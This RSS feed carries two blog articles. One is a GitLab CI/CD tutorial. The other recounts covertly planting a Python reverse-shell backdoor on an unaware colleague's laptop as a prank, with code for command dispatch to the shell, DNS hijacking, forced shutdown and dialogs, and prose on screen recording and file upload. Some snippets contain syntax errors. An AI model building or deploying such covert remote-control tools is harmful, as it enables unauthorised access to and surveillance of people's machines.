<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:dc="http://purl.org/dc/elements/1.1/">
  <channel>
    <title>Forem: Tomas Martincic</title>
    <description>The latest articles on Forem by Tomas Martincic (@martincic).</description>
    <link>https://forem.com/martincic</link>
    <image>
      <url>https://media2.dev.to/dynamic/image/width=90,height=90,fit=cover,gravity=auto,format=auto/https:%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Fuser%2Fprofile_image%2F429996%2F199db5ad-3050-433e-9770-0208f848103e.jpg</url>
      <title>Forem: Tomas Martincic</title>
      <link>https://forem.com/martincic</link>
    </image>
    <atom:link rel="self" type="application/rss+xml" href="https://forem.com/feed/martincic"/>
    <language>en</language>
    <item>
      <title>Structuring a CI/CD workflow in GitLab (Node.js example)</title>
      <dc:creator>Tomas Martincic</dc:creator>
      <pubDate>Thu, 03 Feb 2022 08:25:20 +0000</pubDate>
      <link>https://forem.com/lloyds-digital/structuring-a-cicd-workflow-in-gitlab-nodejs-example-2500</link>
      <guid>https://forem.com/lloyds-digital/structuring-a-cicd-workflow-in-gitlab-nodejs-example-2500</guid>
      <description>&lt;h2&gt;
  
  
  Table of contents
&lt;/h2&gt;

&lt;ol&gt;
&lt;li&gt;What are pipelines&lt;/li&gt;
&lt;li&gt;DevOps pipelines&lt;/li&gt;
&lt;li&gt;What is CI/CD?&lt;/li&gt;
&lt;li&gt;What CI/CD pipeline software to use?&lt;/li&gt;
&lt;li&gt;Why did we choose GitLab?&lt;/li&gt;
&lt;li&gt;Docker Technology&lt;/li&gt;
&lt;li&gt;.gitlab-ci.yml file&lt;/li&gt;
&lt;li&gt;Pipeline lifecycle example&lt;/li&gt;
&lt;li&gt;Conclusion&lt;/li&gt;
&lt;/ol&gt;

&lt;h2&gt;
  
  
  What are pipelines
&lt;/h2&gt;

&lt;p&gt;In computing, a pipeline refers to the logical queue that is filled with instructions for the processor to work through. It is an organized way of storing and queuing tasks and instructions so that the processor can execute them in overlapping stages, assembly-line style. &lt;/p&gt;

&lt;p&gt;This is different from the regular queue or stack data structures in computer science. Those structures follow the FIFO and LIFO approaches, respectively: literally "&lt;strong&gt;F&lt;/strong&gt;irst &lt;strong&gt;I&lt;/strong&gt;n &lt;strong&gt;F&lt;/strong&gt;irst &lt;strong&gt;O&lt;/strong&gt;ut" and "&lt;strong&gt;L&lt;/strong&gt;ast &lt;strong&gt;I&lt;/strong&gt;n &lt;strong&gt;F&lt;/strong&gt;irst &lt;strong&gt;O&lt;/strong&gt;ut", whether the elements are instructions, files, or any other listable items. &lt;/p&gt;
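&lt;p&gt;The two principles are easy to see with a queue and a stack; a minimal Python sketch:&lt;/p&gt;

```python
from collections import deque

# FIFO: a queue - the first task added is the first one out
queue = deque()
for task in ("a", "b", "c"):
    queue.append(task)
first_out = queue.popleft()  # "a"

# LIFO: a stack - the last task added is the first one out
stack = []
for task in ("a", "b", "c"):
    stack.append(task)
last_in_first_out = stack.pop()  # "c"
```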

&lt;h2&gt;
  
  
  DevOps pipelines
&lt;/h2&gt;

&lt;p&gt;DevOps is a set of practices that combines software development and IT operations. It aims to shorten the systems development life cycle and provide continuous delivery with high software quality. DevOps is complementary with Agile software development; several DevOps aspects came from the Agile methodology.&lt;/p&gt;

&lt;p&gt;So if you're planning on having an 'agile' work environment, you must have good software foundations and automation processes set in place to achieve fast-paced development and results. If everything is done manually, the environment would be rigid, stiff, and slow, thus being the exact opposite of agile.&lt;/p&gt;

&lt;h2&gt;
  
  
  What is CI/CD?
&lt;/h2&gt;

&lt;p&gt;In software engineering, CI/CD or CICD is the combined practice of continuous integration and either continuous delivery or continuous deployment. CI/CD bridges the gaps between development and operations activities and teams by enforcing automation in the building, testing, and deployment of applications. Ideally, this shortens the distance between developers working on the project locally in their IDE and the project being published in its production environment, whether on a public domain for clients or a private domain for staging with other branches of the product development lifecycle (backend/frontend/design/QA/testers/...).&lt;/p&gt;

&lt;h4&gt;
  
  
  It works on my machine ¯\_(ツ)_/¯
&lt;/h4&gt;

&lt;p&gt;Not only have we shortened the gap between the developer and the production environment, but we've also introduced assurance that the code will work within that environment. The main point of CI/CD is that install/compilation, build, and test all run inside an environment that mimics production. Therefore we've eliminated the chance of "&lt;em&gt;but it works on my machine&lt;/em&gt;" happening.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fk5smzoxr1ijqsukrk9tl.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fk5smzoxr1ijqsukrk9tl.png" alt="Gitlab pipeline flow"&gt;&lt;/a&gt;&lt;br&gt;
GitLab's CI/CD flow; most other tools follow a broadly similar flow&lt;/p&gt;

&lt;h2&gt;
  
  
  What CI/CD pipeline software to use?
&lt;/h2&gt;

&lt;p&gt;There are many options available to provide continuous delivery and integration in your software development lifecycle. Some of the most popular CI/CD tools are:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;&lt;a href="https://www.jenkins.io" rel="noopener noreferrer"&gt;Jenkins&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://circleci.com" rel="noopener noreferrer"&gt;CircleCI&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://about.gitlab.com" rel="noopener noreferrer"&gt;GitLab&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.jetbrains.com/teamcity" rel="noopener noreferrer"&gt;TeamCity&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.atlassian.com/software/bamboo" rel="noopener noreferrer"&gt;Bamboo&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://github.com/features/actions" rel="noopener noreferrer"&gt;GitHub Actions&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;The tool for the job is a personal preference and depends on which of these tools fit your project, budget, requirements, language, technology, etc.&lt;/p&gt;

&lt;p&gt;From this point on, we will focus on &lt;strong&gt;GitLab's pipeline&lt;/strong&gt;.&lt;/p&gt;

&lt;h2&gt;
  
  
  Why did we choose GitLab?
&lt;/h2&gt;

&lt;p&gt;Well, the choice was not a hard one. GitLab is our default VCS and provides a rich set of features for CI/CD pipelines leveraging Docker technology. The beauty of in-house CI/CD integration with your VCS is that the pipeline can be triggered by all kinds of developer events: pushing to a certain branch, including a specific trigger key in a commit message, opening a Merge Request, the success of a merge, and so on. &lt;/p&gt;
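&lt;p&gt;As a rough sketch (job names and branch names here are hypothetical, not from our setup), such triggers are configured per job in &lt;code&gt;.gitlab-ci.yml&lt;/code&gt;:&lt;/p&gt;

```yaml
# Hypothetical jobs illustrating trigger conditions
lint:
  script:
    - npm run lint
  only:
    - merge_requests   # runs only when a Merge Request is opened/updated

deploy-staging:
  script:
    - echo "deploying to staging"
  only:
    - develop          # runs only for pushes to the develop branch
```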

&lt;p&gt;&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fiz98lz5kxqg41mhkjhbp.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fiz98lz5kxqg41mhkjhbp.png" alt="Gitlab pipeline stages"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;This approach allows the DevOps engineer to configure the pipeline so that the other software engineers simply continue with their usual workflows, completely oblivious to what's happening in the background. This is great because you only need one good engineer to configure and maintain it, while the rest of the team/organization doesn't have to learn the technology inside out to use it.&lt;/p&gt;

&lt;p&gt;Alongside being our default VCS and having great flexibility, GitLab can also be hosted on-premise. This way we are not using GitLab's own runners (the servers that execute pipelines) but our own, and since GitLab only charges for computing time on their runners, we save some money. That said, GitLab's runners are fast and relatively cheap ($10 for 1,000 minutes of computation), which can be a good approach even for big companies: in the long run it may cost much less than configuring and maintaining their own cluster of runners. &lt;/p&gt;

&lt;h2&gt;
  
  
  Docker Technology
&lt;/h2&gt;

&lt;p&gt;Docker is a set of 'platform as a service' products that use OS-level virtualization to deliver software in packages called containers. Containers are isolated from one another and bundle their software, libraries, and configuration files; they can communicate with each other through well-defined channels. A Docker container image is a lightweight, standalone, executable package of software that includes everything needed to run an application: code, runtime, system tools, system libraries, and settings. &lt;/p&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fwa2gd3q1qp20xw9p1aso.jpg" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fwa2gd3q1qp20xw9p1aso.jpg" alt="Docker vs Virtual Machine"&gt;&lt;/a&gt;&lt;br&gt;
&lt;strong&gt;The main difference between Docker and virtual machines is that Docker runs containers on a shared host kernel through its container engine, whereas virtual machines virtualize entire guest operating systems.&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;In essence, Docker allows you to simulate the production environment by replicating it beforehand, containerizing it, and publishing it to &lt;a href="https://hub.docker.com" rel="noopener noreferrer"&gt;hub.docker.com&lt;/a&gt;. The important thing to consider is that you want to keep your Docker image as minimal as possible, because a bloated image puts a heavy load on the machine using it. You want to containerize only the services you need to use and test. For our backend stack, for example, we containerized PHP 8 on Ubuntu and added node, npm, and composer to the container. That's it, voila! You might think it's smart to ship other technologies in the same container, but using this backend container to test frontend services, for example, would be pretty inefficient.&lt;/p&gt;

&lt;p&gt;A much better approach is to use a different image for each stack you require; otherwise, you will have unused software in your container. &lt;br&gt;
&lt;em&gt;"Yeah I have it on my computer and server too, so what's the deal?"&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;The thing is, for every job in the pipeline, Docker fires up a fresh container and boots it. If you want the pipeline to be fast, you want the container to be as minimal as possible: the backend image carries only backend software, whereas the frontend boots only a node.js image, without PHP and composer. Separating services into different containers will speed up the pipeline overall.&lt;/p&gt;
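&lt;p&gt;In GitLab's terms, that separation is just a different &lt;code&gt;image&lt;/code&gt; per job; a sketch (job names and image tags are illustrative):&lt;/p&gt;

```yaml
backend-tests:
  image: php:8.0        # only what the backend needs
  script:
    - composer install
    - vendor/bin/phpunit

frontend-tests:
  image: node:latest    # only what the frontend needs
  script:
    - npm ci
    - npm test
```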

&lt;p&gt;Boot time is the biggest overhead you get from additional software, but only if you are using a self-hosted runner. If you're running the pipeline on GitLab's servers instead, the image must be downloaded for every job of the pipeline. With big images full of unneeded software, both the download and the boot take longer, and since GitLab charges per minute of processing time, you're doubly inefficient. &lt;/p&gt;

&lt;h2&gt;
  
  
  .gitlab-ci.yml file
&lt;/h2&gt;

&lt;p&gt;YAML is used because it is easier for humans to read and write than other common data formats like XML or JSON, and libraries for working with YAML are available in most programming languages. For the syntactic guidelines of YAML files, &lt;a href="http://giybf.com" rel="noopener noreferrer"&gt;Google is your best friend&lt;/a&gt;.&lt;/p&gt;

&lt;p&gt;This file is the main configuration for your GitLab pipeline. Once you add it to your project, GitLab will run through it whenever you change something in the repository. Here you define the flow of your pipeline: its jobs and stages, what they do, when they execute, etc. By default, the pipeline uses shared GitLab runners, where you get &lt;a href="https://about.GitLab.com/blog/2020/09/01/ci-minutes-update-free-users/#changes-to-the-gitlabcom-free-tier" rel="noopener noreferrer"&gt;400 free minutes&lt;/a&gt; monthly.&lt;/p&gt;

&lt;p&gt;The YAML file has a variety of keywords and control structures that let you define the what and the when. The content of a job, within the &lt;code&gt;script&lt;/code&gt; tag, is the list of commands that will execute inside the Docker container holding your application. Here are some of the most common keywords: &lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;code&gt;image&lt;/code&gt; - defines which docker container will run for given job/pipeline (pulls from &lt;a href="https://hub.docker.com" rel="noopener noreferrer"&gt;hub.docker.com&lt;/a&gt;)&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;stages&lt;/code&gt; - define stages in which you can group your jobs. Stages run serially (one after another), whereas jobs within the same stage run in parallel &lt;/li&gt;
&lt;li&gt;
&lt;code&gt;only&lt;/code&gt; - defines when a job will run (eg. only on merge request)&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;artifacts&lt;/code&gt; - defines which files will be shared between different jobs (because the new container is initialized per job, thus contents are lost unless specified with artifacts)&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;cache&lt;/code&gt; - defines which files will be saved on the runner and reused between pipeline runs (eg. dependency directories), to speed up subsequent jobs&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;script&lt;/code&gt; - defines what commands will be executed within the container (OS-level commands, eg. &lt;code&gt;echo&lt;/code&gt;, &lt;code&gt;apt-get install&lt;/code&gt;, &lt;code&gt;composer install xy&lt;/code&gt;)&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;These are some of the main control structures out of many, for more you can &lt;a href="https://docs.gitlab.com/ee/ci/yaml/index.html" rel="noopener noreferrer"&gt;check the documentation&lt;/a&gt;.&lt;/p&gt;

&lt;h2&gt;
  
  
  Pipeline lifecycle example
&lt;/h2&gt;

&lt;p&gt;The pipeline starts from the &lt;code&gt;.gitlab-ci.yml&lt;/code&gt; file. Here we'll analyze a simple pipeline configuration and what happens each step of the way. We will consider the following pipeline for a front-end project. &lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;

image: node:latest

stages:
  - build
  - run

# Job's name
first-job:
  # Define stage
  stage: build
  # What to run on the job.
  script:
    - npm install
  artifacts:
    paths:
      - node_modules

second-job:
  stage: run
  script:
    - npm run start
    - node test.js
  artifacts:
    paths:
      - node_modules/

second-job-parallel:
  stage: run
  script:
    - echo "I'm running at the same time as second-job!!!"


&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;p&gt;As we can see, we have two stages. The first stage installs the modules and has only one job. The second stage kicks in if the first one finishes successfully and starts two jobs in parallel.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fdfpk7kplpm9tqm6htqc8.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fdfpk7kplpm9tqm6htqc8.png" alt="Gitlab's visualization of stages and jobs"&gt;&lt;/a&gt;&lt;br&gt;
&lt;em&gt;Gitlab's visualization of stages and jobs&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;The first thing that happens once you push your code is that GitLab scans the &lt;code&gt;.gitlab-ci.yml&lt;/code&gt;. If the configuration imposes no limitations, the pipeline will run on every push, merge request, and merge result. GitLab will then contact the 'runner', i.e. the server that will execute your pipeline. &lt;strong&gt;Note&lt;/strong&gt;: if you have a single GitLab runner, pipelines will queue on the FIFO principle. &lt;/p&gt;

&lt;p&gt;Once the server responds, it will start the Docker executor with the image you've specified, in our case &lt;a href="https://hub.docker.com/_/node?tab=tags&amp;amp;page=1" rel="noopener noreferrer"&gt;node:latest&lt;/a&gt;. If required, you can specify a different image for each job. If the server has the image cached, it will use it right away; otherwise, it will have to download it first.&lt;/p&gt;

&lt;p&gt;Then, once your container is ready and booted, your project is downloaded from the repository, you are placed in the project root directory, and the commands you've provided in the &lt;code&gt;script&lt;/code&gt; list start executing. In our case, that installs the node modules. Once the job is finished, the artifacts are uploaded so the next job that uses them can download them back into its container. Then the cleanup kicks in and the container is closed.&lt;/p&gt;

&lt;p&gt;The second job is only slightly different. It downloads the artifacts right after the project is downloaded, so everything is ready for the scripts. Once this job finishes, it again uploads the modified artifacts for whoever might use them next. Structurally it is otherwise the same as the first job, but the commands differ: here, as an example, we run test.js to check that our application is working. These are the contents of test.js:&lt;/p&gt;


&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;

console.log('Hello from Node.js!')
console.log(new Date().toUTCString())
console.log('Exiting Node.js...')

&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;
&lt;h4&gt;
  
  
  Here is the output from the second job:
&lt;/h4&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fqc0aa7e05crmojzuy2yo.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fqc0aa7e05crmojzuy2yo.png" alt="Pipeline output on gitlab"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;And the last job is no different from the others, it just proved to us that two jobs can indeed run in parallel.&lt;/p&gt;

&lt;h2&gt;
  
  
  Conclusion
&lt;/h2&gt;

&lt;p&gt;To conclude, I would say that having these operations set in stone is a &lt;strong&gt;must&lt;/strong&gt; for any serious company. Human error is removed from the equation and monotonous tasks are automated. A good pipeline will also deploy the code to a staging server, the company's internal server for testing, quality assurance, and collaboration; but ultimately all production deploys should be done manually, by setting the &lt;code&gt;when&lt;/code&gt; key to &lt;code&gt;manual&lt;/code&gt; in the &lt;code&gt;.gitlab-ci.yml&lt;/code&gt; file. Many more things could be done within the pipeline, such as benchmarking the app, stress-testing, and others. I might cover them in the next blog, but until then, what features do you think would make an awesome pipeline? &lt;/p&gt;
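&lt;p&gt;A sketch of such a manual production deploy job (the stage, job name, and deploy script are placeholders):&lt;/p&gt;

```yaml
deploy-production:
  stage: deploy
  script:
    - ./deploy.sh       # placeholder for your actual deploy commands
  when: manual          # someone must click "play" in the GitLab UI
  only:
    - main
```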

&lt;p&gt;Lloyds is available for partnerships and open for new projects. If you want to know more about us, click &lt;a href="https://lloyds-digital.com/" rel="noopener noreferrer"&gt;here&lt;/a&gt;.&lt;br&gt;
Also, don’t forget to follow us on &lt;a href="https://www.instagram.com/lloyds.digital/" rel="noopener noreferrer"&gt;Instagram&lt;/a&gt; and &lt;a href="https://www.facebook.com/lloydsdigital/" rel="noopener noreferrer"&gt;Facebook&lt;/a&gt;!&lt;/p&gt;

</description>
      <category>webdev</category>
      <category>git</category>
      <category>pipeline</category>
      <category>cicd</category>
    </item>
    <item>
      <title>How to hack your colleague with Python</title>
      <dc:creator>Tomas Martincic</dc:creator>
      <pubDate>Fri, 30 Jul 2021 06:53:59 +0000</pubDate>
      <link>https://forem.com/martincic/how-to-prank-hack-your-colleague-34lo</link>
      <guid>https://forem.com/martincic/how-to-prank-hack-your-colleague-34lo</guid>
      <description>&lt;h2&gt;
  
  
  Result of our actions
&lt;/h2&gt;

&lt;p&gt;Imagine one peaceful morning, you start working on your laptop and suddenly - your laptop starts restarting. Once. Twice. Your work is not saved and you are somewhat frustrated. Then suddenly, fishy NSFW websites start popping up. There is confusion in the air. &lt;/p&gt;

&lt;p&gt;Next thing you know, your internet is not working. Your client's API is effectively returning 404, your browser is returning 404, and you are offline from the company's Slack for no apparent reason. But the whole office is online, and we are all on the same Wi-Fi?! &lt;/p&gt;

&lt;p&gt;After 20 minutes of troubleshooting, your laptop starts working again. Finally, you get your connection back, perform a factory reset, and have a squeaky clean PC to work with. You start a meeting, and suddenly the computer goes crazy and starts playing pig noises at full volume in the middle of the office. Then the background changes to an NSFW image, loud NSFW voices come from your laptop, and the CTO is giving you sh*t to turn it all down while the office is on fire (people rolling on the floor laughing). Who would've imagined that everyone in the office at that moment was part of the prank being pulled on you?&lt;/p&gt;

&lt;h2&gt;
  
  
  Introduction
&lt;/h2&gt;

&lt;p&gt;First of all, I want everyone to understand that what I am about to present is for &lt;strong&gt;educational purposes only&lt;/strong&gt;. These methods should not be abused for purposes they are not meant to serve.&lt;/p&gt;

&lt;p&gt;So it all started one sunny morning in the office kitchen. Luka and I were drinking coffee, making jokes about hacking NASA. The CEO overheard us and suggested we prank hack someone from the office if we had free time. Our eyes lit up like children's in a candy shop. Luckily for us, we always have free time, and we started working immediately. Luka's &lt;a href="https://urn.nsk.hr/urn:nbn:hr:211:231137"&gt;master's thesis&lt;/a&gt; gave us a good head start, since he wrote about &lt;em&gt;methods of ethical hacking&lt;/em&gt; and built a Python program capable of a reverse shell, with the client and server code together totaling 65 lines. About 3 hours later, at our backend team code review, we had a working prototype. It could execute various commands for us and gave us SSH access, and the client had a reverse-shell backdoor in case the SSH was shut down. The CTO (our team lead) was impressed, and we got a green light to use all available resources to make this happen.&lt;/p&gt;

&lt;h2&gt;
  
  
  Structure of the attack
&lt;/h2&gt;

&lt;p&gt;The script was split into two parts, the server and the client. Since this was a reverse-shell attack, we (the hackers) were the server, and the hacked person was the client. All we had to do was set up his laptop to run the client on startup. That way, whenever he was in the office, the script was running in the background, constantly checking whether the server was available; once we started our server, the client would reconnect. The beauty of a reverse shell is that we could've abused him from anywhere on the planet, because the only port forwarding that needed to be configured was on the server side. The client was creating outgoing requests, which the router would not block. Once we sent a command from the server, the client would receive it and parse it if there was extra work to do; if there was nothing to parse, it would pipe the command into the terminal.&lt;/p&gt;

&lt;h2&gt;
  
  
  Usage of the program
&lt;/h2&gt;

&lt;p&gt;The program which we used as a layer between us and the hacked colleague (further on referenced as 'the client') was written in Python. By default, what we've had from Luka's &lt;a href="https://urn.nsk.hr/urn:nbn:hr:211:231137"&gt;master's thesis&lt;/a&gt; was direct shell access, but we expanded it to be a filter for incoming commands. For example, if we wanted to open up a program, it was very simple to open it with &lt;code&gt;open programName&lt;/code&gt; in a shell. &lt;/p&gt;

&lt;p&gt;But if we wanted to randomize the whole desktop, create dummy folders, and hide items within, this required many commands. We would put this logic inside a function, and when we receive a command which we defined (eg. 'randomize-desktop N' where N is a number of folders) we would simply call the corresponding function and feed it parameter N. &lt;/p&gt;

&lt;p&gt;The flow of this system was the following: &lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;commands were coming from the server to the client&lt;/li&gt;
&lt;li&gt;client would try to parse the command into one of its internal functions&lt;/li&gt;
&lt;li&gt;if none corresponded it would simply pipe the result directly into the shell&lt;/li&gt;
&lt;li&gt;repeat indefinitely&lt;/li&gt;
&lt;/ol&gt;
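&lt;p&gt;The flow above boils down to a small dispatch loop. A minimal sketch (the handler names and commands here are hypothetical, not the actual program):&lt;/p&gt;

```python
import subprocess

# Hypothetical handler for a custom command (stand-in, not the real implementation)
def randomize_desktop(n):
    return "created {} folders".format(n)

# Map of recognized custom commands to their handler functions
HANDLERS = {"randomize-desktop": randomize_desktop}

def handle(command):
    name, _, arg = command.partition(" ")
    if name in HANDLERS:
        # 2. a recognized custom command: call the corresponding function
        return HANDLERS[name](int(arg))
    # 3. nothing to parse: pipe the command straight into the shell
    result = subprocess.run(command, shell=True, capture_output=True, text=True)
    return result.stdout.strip()
```

&lt;p&gt;Calling &lt;code&gt;handle("randomize-desktop 3")&lt;/code&gt; dispatches to the handler, while anything unrecognized, like &lt;code&gt;handle("echo hello")&lt;/code&gt;, falls through to the shell.&lt;/p&gt;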

&lt;h3&gt;
  
  
  Server.py
&lt;/h3&gt;

&lt;p&gt;The server initializes a socket on some arbitrary port that is usually not used. It also sets the number of possible incoming connections; in our case, it was 5. This would allow us to run a Command and Control center for up to 5 clients at a time. We did not distinguish between them, so when sending a command, we'd send it to all clients. The &lt;code&gt;send_commands&lt;/code&gt; function is called at the end; it sits in an infinite loop asking us for input. When we enter some data, we turn it into a byte array, and if more than 0 bytes were entered, we send it to the client(s) connected to our socket.&lt;/p&gt;

&lt;h3&gt;
  
  
  Client.py
&lt;/h3&gt;

&lt;p&gt;The client initializes a socket that connects to our server on the chosen arbitrary port. Everything it receives, it decodes to UTF-8 and pipes into the shell. All the output is read from the shell, translated into a byte array, and sent back to the Command and Control server.&lt;/p&gt;

&lt;h4&gt;
  
  
  Learn more
&lt;/h4&gt;

&lt;p&gt;Base code for server.py and client.py are further explained in my colleague's &lt;a href="https://urn.nsk.hr/urn:nbn:hr:211:231137"&gt;master's thesis&lt;/a&gt; on pages 54 and 55. I will, from here onwards, explain command by command. If there is any uncertainty, leave a comment below, and we'll discuss it further.&lt;/p&gt;

&lt;h2&gt;
  
  
  List of commands and abilities
&lt;/h2&gt;

&lt;p&gt;I will skip over some commands, such as 449 &amp;amp; 450, which are composites of other commands. For example, 450 is just a combination of &lt;code&gt;set-bg&lt;/code&gt; and &lt;code&gt;play-sound&lt;/code&gt;. Also, 8000 is equivalent to the &lt;code&gt;say&lt;/code&gt; command found on macOS, and the media command is short for &lt;code&gt;ls media&lt;/code&gt;. For play-sound, we changed the implementation from Python's playsound library to macOS's default afplay. The beauty of playing music this way is that the audio cannot be turned off, because there is no window to close; it's a process under the hood that is playing it.&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
404: Turns internet off - sets DNS to non-existing one&lt;/li&gt;
&lt;li&gt;
409: Restarts PC&lt;/li&gt;
&lt;li&gt;
423: Hibernates PC&lt;/li&gt;
&lt;li&gt;449: Plays Windows error message - Usage: (449) plays sound once. If you want to play N times use 449 N&lt;/li&gt;
&lt;li&gt;450: Plays Windows XP error sound and sets windows XP background&lt;/li&gt;
&lt;li&gt;8000: Tells something to the client - text-to-speech AI will interpret your text to sound on client’s laptop - Usage: 8000 “hello world”&lt;/li&gt;
&lt;li&gt;media: Lists available media&lt;/li&gt;
&lt;li&gt;
dialog: Shows message dialog - Usage: pass parameters split with underscores, Title_Body_Button1_Button2&lt;/li&gt;
&lt;li&gt;
screen: Records screen for N seconds - Usage: ex. screen N fileName.mp4 - N is number of seconds, fileName is name of recording file&lt;/li&gt;
&lt;li&gt;
set-bg: Sets background - Usage: ex. set-bg fileName.png - find files with media command&lt;/li&gt;
&lt;li&gt;play-sound: Plays sound - Usage: ex. play-sound fileName.mp3 - find files with media command&lt;/li&gt;
&lt;li&gt;
upload: Uploads file to victim - Usage: ex. upload filename.ext - files are located at C:\xampp\htdocs&lt;/li&gt;
&lt;li&gt;
folders: Creates N random folders and existing desktop items are moved in them - Usage: ex. folders N, where N is number of folders&lt;/li&gt;
&lt;li&gt;volume control&lt;/li&gt;
&lt;/ul&gt;

&lt;h4&gt;
  
  
  404
&lt;/h4&gt;

&lt;p&gt;This is an internet toggle. There is a nice command on macOS called &lt;code&gt;networksetup&lt;/code&gt; with which you can configure various network settings. We've decided to turn the DNS off because it's quite hard to troubleshoot.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;def switchDNS(client, condition):
    ip = '123.123.123.123' #Non existing dns
    output = 'INTERNET TURNED OFF - Client's internet will now appear as offline and all content will respond with 404'
    if condition:
        ip = '8.8.8.8' #Google's DNS
        output = 'INTERNET TURNED ON - Client's internet will now appear normal'

    command = 'networksetup -setdnsservers Wi-Fi ' + ip
    cmd = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
    respond(client, output)
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;This is mostly self-explanatory except for the &lt;code&gt;subprocess.Popen&lt;/code&gt; part, which pipes the string (the command variable) to the shell and executes it.&lt;/p&gt;

&lt;h4&gt;
  
  
  409-423
&lt;/h4&gt;


&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;def hybernatePC(client):
    respond(client, "Hybernating PC...")
    os.system("shutdown -h now")

def restartPC(client):
    respond(client, "Restarting PC...")
    os.system("shutdown -r now")
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;code&gt;import os&lt;/code&gt; allows us to execute a command in the shell, much like &lt;code&gt;subprocess.Popen&lt;/code&gt;. The only difference is that &lt;code&gt;os.system&lt;/code&gt; sometimes does not have enough permissions to execute a given command. I've grouped these two commands because the only thing that changes is the parameter, &lt;code&gt;-r&lt;/code&gt; or &lt;code&gt;-h&lt;/code&gt;, which defines what kind of shutdown will happen.&lt;/p&gt;

&lt;h4&gt;
  
  
  dialog
&lt;/h4&gt;


&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;def messageDialog(client, data):
    items = data[7:].split('_')    
    print(items)
    title = items[0]
    body = items[1]
    button1 = items[2]
    button2 = items[3]
    output = "Message dialog shown!"
    command = 'osascript -e \'display dialog "'+body+'" buttons {"'+button1+'", "'+button2+'"} with title "'+title+'"\' &amp;amp;&amp;gt;/dev/null'
    os.system(command)
    respond(client, output)
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



